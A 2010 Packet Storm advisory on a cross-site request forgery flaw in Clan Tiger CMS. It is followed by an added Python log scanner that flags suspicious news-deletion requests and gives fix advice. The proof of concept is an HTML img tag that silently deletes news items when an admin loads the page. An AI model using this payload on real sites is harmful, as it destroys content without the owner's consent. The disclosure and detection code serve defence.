Clan Tiger Cross Site Request Forgery

2010-03-16T00:00:00
ID PACKETSTORM:87334
Type packetstorm
Reporter Pratul Agrawal
Modified 2010-03-16T00:00:00

Description

                                        
=======================================================================

Clan_Tiger_CMS CSRF Vulnerability

=======================================================================
  
  
  
  
  
# Vulnerability found in - Admin module
  
# email Pratulag@yahoo.com  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Software Clan Tiger_CMS  
  
# Category CMS / Portals  
  
# Site p4ge http://server/clantiger/index.php?module=login  
  
# Platform php
  
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)  
  
  
  
# Proof of concept #  
  
Targeted URL: http://servername/clantiger/  
  
  
Script to delete the news content through cross-site request forgery
  
. ................................................................................................................  
  
<html>
<body>
<img src="http://demo.opensourcecms.com/clantiger/clantiger/index.php?module=news&action=remove&id=[user ID]" />
</body>
</html>
  
. ..................................................................................................................  
  
  
  
After execution, refresh the page and you can see that the added content has been deleted automatically.
  
  
# If you have any questions, comments, or concerns, feel free to contact me.
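A log check for the request pattern in the proof of concept above, added here as an example and not part of the original advisory: it flags GET requests for module=news&action=remove whose Referer is missing or names another host. The Apache combined log format, the host name cms.example and every sample line are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access-log format (assumed; adjust to your server).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def referer_host(value):
    """Lower-cased host of a Referer value, or None if absent or malformed."""
    try:
        return urlsplit(value).hostname
    except ValueError:
        return None

def csrf_suspects(lines, site_host):
    """Return (timestamp, client_ip, referer) for GET news deletions whose
    Referer is absent or names a host other than site_host (lower case)."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "GET":
            continue
        query = parse_qs(m["target"].partition("?")[2])
        if query.get("module") != ["news"] or query.get("action") != ["remove"]:
            continue
        if referer_host(m["referer"]) != site_host:
            hits.append((m["ts"], m["ip"], m["referer"]))
    return hits

# Constructed sample lines (documentation IP ranges, example host names).
SAMPLE_LOG = [
    # Deletion clicked from the CMS's own news page: same-site Referer.
    '203.0.113.10 - - [16/Mar/2010:10:02:11 +0000] "GET /clantiger/index.php?module=news&action=remove&id=7 HTTP/1.1" 302 - "http://cms.example/clantiger/index.php?module=news" "Mozilla/5.0"',
    # Same deletion URL loaded while the admin was viewing another site.
    '203.0.113.10 - - [16/Mar/2010:10:05:40 +0000] "GET /clantiger/index.php?module=news&action=remove&id=8 HTTP/1.1" 302 - "http://forum.example.net/thread/42" "Mozilla/5.0"',
    # Deletion URL requested with no Referer at all.
    '198.51.100.23 - - [16/Mar/2010:10:09:03 +0000] "GET /clantiger/index.php?module=news&action=remove&id=9 HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    # Read-only request: not a deletion, ignored.
    '198.51.100.23 - - [16/Mar/2010:10:09:30 +0000] "GET /clantiger/index.php?module=news&action=view&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ts, ip, referer in csrf_suspects(SAMPLE_LOG, "cms.example"):
        print(f"{ts} {ip} news removal via GET, referer={referer!r}")
```

A same-site Referer does not prove the request was intended, and browsers may omit the header, so treat hits as triage leads; the application-side fix is to accept deletions only via POST carrying a per-session anti-CSRF token.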
  